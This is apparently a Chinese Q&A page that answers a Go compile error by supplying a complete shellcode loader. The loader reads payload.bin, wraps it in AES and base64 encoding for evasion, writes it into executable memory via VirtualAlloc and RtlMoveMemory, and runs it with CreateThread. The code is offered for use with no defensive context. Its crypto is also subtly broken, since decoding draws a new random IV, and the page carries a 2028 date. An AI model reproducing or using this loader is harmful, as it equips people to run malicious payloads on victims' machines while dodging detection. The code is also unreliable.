• 日期: 2028-02-28
  • 标签: 常规

该代码中调用了 Windows 系统的 API 函数,需要导入相应的库文件,并声明相关函数。

解决后的代码如下:

package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"io/ioutil"
	"syscall"
	"time"
	"unsafe"
)

var (
	kernel32           = syscall.MustLoadDLL("kernel32.dll")
	VirtualAlloc       = kernel32.MustFindProc("VirtualAlloc")
	RtlMoveMemory      = kernel32.MustFindProc("RtlMoveMemory")
	CreateThread       = kernel32.MustFindProc("CreateThread")
	WaitForSingleObject = kernel32.MustFindProc("WaitForSingleObject")
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

type CipherFunc func(key []byte, src []byte) []byte

func AesCipher(key []byte, src []byte) []byte {
	block, _ := aes.NewCipher(key)
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src)
	return append(iv, dst...)
}

func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	return cipher(key, src)
}

func Encode(src string, key []byte) string {
	payloadBytes := []byte(src)
	encodedBytes := Crypt(AesCipher, key, payloadBytes)
	bdata := base64.StdEncoding.EncodeToString(encodedBytes)
	return bdata
}

func Decode(src string, key []byte) []byte {
	decodedBytes, _ := base64.StdEncoding.DecodeString(src)
	payloadBytes := Crypt(AesCipher, key, decodedBytes[16:])
	return payloadBytes
}

func exec(charcode []byte) {
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	time.Sleep(5)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5)
	WaitForSingleObject.Call(handle, syscall.INFINITE)
}

func readFile(filename string) []byte {
	data, _ := ioutil.ReadFile(filename)
	return data
}

func main() {
	key := make([]byte, 16)
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	payload := string(readFile("./payload.bin"))
	encodedPayload := Encode(payload, key)
	shellCodeHex := Decode(encodedPayload, key)
	execFunc := exec
	execFunc(shellCodeHex)
}
Go 语言代码编译错误:undefined: VirtualAlloc、RtlMoveMemory、CreateThread 解决方法

原文地址: https://www.cveoy.top/t/topic/lKT8 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录